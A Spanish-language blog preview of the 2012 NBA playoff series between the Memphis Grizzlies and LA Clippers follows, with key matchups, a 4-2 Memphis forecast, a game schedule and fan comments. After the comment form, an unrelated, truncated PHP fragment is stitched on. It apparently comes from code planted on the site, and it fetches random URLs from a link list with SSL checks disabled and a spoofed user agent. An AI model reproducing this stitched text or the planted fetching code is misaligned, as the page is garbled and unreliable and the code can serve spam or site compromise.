Análisis: Memphis Grizzlies (4) vs L.A. Clippers (5)

29 de April de 2012 por Viva_Dirk

Regular: 2-1

Clippers: 97.5 PF – 95 PC

Grizzlies: 99.9 PF – 97.6 PC

Duelo igualadísimo el que se espera en esta serie. Sus armas son bien diferentes pero en ambos casos son muy difíciles de parar cuando son bien ejecutadas. Los Clippers han disfrutado de una excelente temporada de Chris Paul, uno de los mejores bases de la liga, que ha surtido de canastas tanto a tiradores como a interiores. Griffin, a pesar de las múltiples críticas que han surgido a su alrededor, es un seguro de vida bajo los aros, y la cuadrilla de secundarios tiene jugadores de casi todos los perfiles. En Memphis, por contra, han tenido que convivir con la baja de Zach Randolph durante todo el año, lo que ha producido un juego aún más colectivo que el visto en los Playoffs de 2011. Con Rudy Gay como punta de lanza y Marc Gasol convirtiéndose en All-Star, solo queda esperar que Zach llegue en óptimas condiciones a la pelea por el anillo.

Claves de la eliminatoria

– Potencia vs técnina: El juego interior de los Clippers está formado por jugadores cuyas canastas suelen ser hundiendo el balón en el aro, imponen su físico para hacerlo y rara vez recuren a otro recurso. Por contra, Memphis tiene en la pareja Zach-Marc dos jugadores capaces de anotar de múltiples maneras y, en el caso del español, de desatacar la zona con pases precisos. Además, Speights es un tercer hombre de lujo.

– Segunda unidad: Mo Williams y Nick Young salen al campo con la única intención de ametrallar la canasta contraria, y Kenyon Martin, de pegarse con quien sea necesario. Los dos exteriores son una fuente importante de anotación para los Clippers y de su acierto dependerá buena parte de esta serie. Un papel similar cumple OJ Mayo en los Grizzlies, aunque su cometido va algo mas allá de anotar. Por momentos puede tomar las riendas del equipo y ejercer de líder. Después de él, dependerá del estado de Zach Randolph, si vemos a Speights disputar 20 intensos minutos o si es el propio Randolph el que ofrece aún más dinamita.

– Defensa de perimetro: Memphis cuenta con una de las defensas exteriores más duras de la liga. Tony Allen lidera al equipo en este aspecto y puede que, si la cosa se pone fea, sea el encargado principal de defender a Chris Paul. En los Clippers cualquiera de sus escoltas es un agujero defensivamente hablando y Caron Butler lo tiene realmente difícil con Rudy Gay. Habrá que ver si Ryan Gomes disfruta de algún minuto más para cubrir este aspecto.

Pronóstico

4-2 Memphis

Calendario

Partido 1 – Lunes 30 de abril en Memphis (3h30)
Partido 2 – Jueves 3 de mayo en Memphis (3h30)
Partido 3 – Sábado 5 de mayo en Los Angeles (22h30)
Partido 4 – Lunes 7 de mayo en Los Angeles
Partido 5 – Miércoles 9 de mayo en Memphis
Partido 6 – Viernes 11 de mayo en Los Angeles
Partido 7 – Domingo 13 de mayo en Memphis

Comenta

10 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    4-1 Memphis. Son demasiado superiores

      Citar

  2. Lucho dice:
    #2

    Memphis 4-2 para mi

      Citar

  3. Nacho dice:
    #3

    Sancho88:
    4-1 Memphis. Son demasiado superiores

    Quizás esa es la frase, “demasiado superiores”. Espero que ellos también lo sepan, porque hay veces que…
    Y en el fondo de eso se trata, de saber cómo somos. Si los ositos lo saben, no tienen límites, para ganarles habría que jugar muy, pero que muy bien. Y ojo que algunos lo pueden hacer, pero me gustaría que realmente los pusieran en esos límites. Obviamente los Clippers no son de esa banda.

      Citar

  4. melo15 dice:
    #4

    Creo que subestimais a los Clipper y sobre todo a Chris Paul, yo creo que la va a liar parada y se va a comer a los Grizzlies

      Citar

  5. simon dice:
    #5

    yo ya lo dije en el post de la ultima jornada de la regular, veo un 4-1 aun valorando el impacto de Chris Paul. Creo que es la serie mas igualada del Oeste, pero por ejemplo Lakers y SAS creo que se van a dejar algun partido por pura relajación, cosa que no va a pasar con Grizzlies que van a salir a muerte en todos los partidos, del staples se llevan uno fijo, y no veo a clippers ganando en Memphis, además creo que Memphis es de los equipos que mejor pueden parar a Clippers.
    Joel Anthony es nulo en ataque salvo para los alley ops y Gasol podrá estar mas liberado para hacer las ayudas a los compañeros. Griffin creo que se va a pegar una ostia de impresión en estos Play off, anotará en los primeros cuartos e incluso en el segundo y no más… y en defensa Randolph le hará un trajecito. Gay creo que va a pasar por encima de Butler, este año ha jugado a un nivel altísimo y querrá refrendarlo en PO, Butler parece una victima propiciatoria. En el puesto de 2 Mayo puede ponerse las botas contra su par, e incluso Tony Allen, el cual en defensa puede que se enfrente a menudo a Chris Paul que también será defendido por Conley que es un excelente defensor. Y si nos ponemos a comparar banquillos Pondexter, Arenas, Pargo, CUnningan y Speigts pasarán porencima del banquillo de Clippers.

      Citar

  6. MagicJohnson32 dice:
    #6

    Los Grizz han de poner todos sus esfuerzos en frenar a Paul. Como apunta Viva en el análisis, se pueden permitir poner a Tony Allen sobre CP3. No creo que Hollins lo haga de inicio pero sí como recurso a lo largo de los partidos.

    Aunque los Grizz son mejor equipo, mucho más profundo, y tienen un mejor entrenador, creo que Paul va a ganar algún partido él solo y varios se van a decidir al final.

      Citar

  7. Lucho dice:
    #7

    Con un 35-13 en el ultimo cuarto, los Clippers ganan 99-98 (igual resultado q OKC)

      Citar

  8. Esteban dice:
    #8

    Ja los clippers remontan maas de 20 puntos, este part puede marcar la serie, no por la localia, sino por el golpe animico, no pude ver el partido pero no se puede imaginar semejante remontada

      Citar

  9. simon dice:
    #9

    alguna vez alguien ha visto semejante remontada? no vi el partido asi que no voy a opinar. Iba a preguntar si fue cortocircuito Grizzlie o maravilla Clippers, pero para semejante remontada imagino que tuvieron que ser las dos…

      Citar

  10. Nacho dice:
    #10

    ¡Dios! Acabo de verlo. Tres primeros cuartos impresionantes de los Grizzlies. Jugando en plan campeón. A falta de un minuto para el tercer cuarto van de casi 30. Empiezo a pasarlo rápido (lo grabé anoche) y veo que a mitad del último cuarto están a 12. Me quedo viéndolo y es que en 9 minutos han metido un punto. La canasta de Gay a falta de 30 segundos ha sido la única en juego en los últimos 10 minutos. Caraja mortal para un partido que no ganaban, sino que arrasaban. Reggie Evans jugando los minutos calientes, y metiendo canastas en el último minuto. Brutal.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>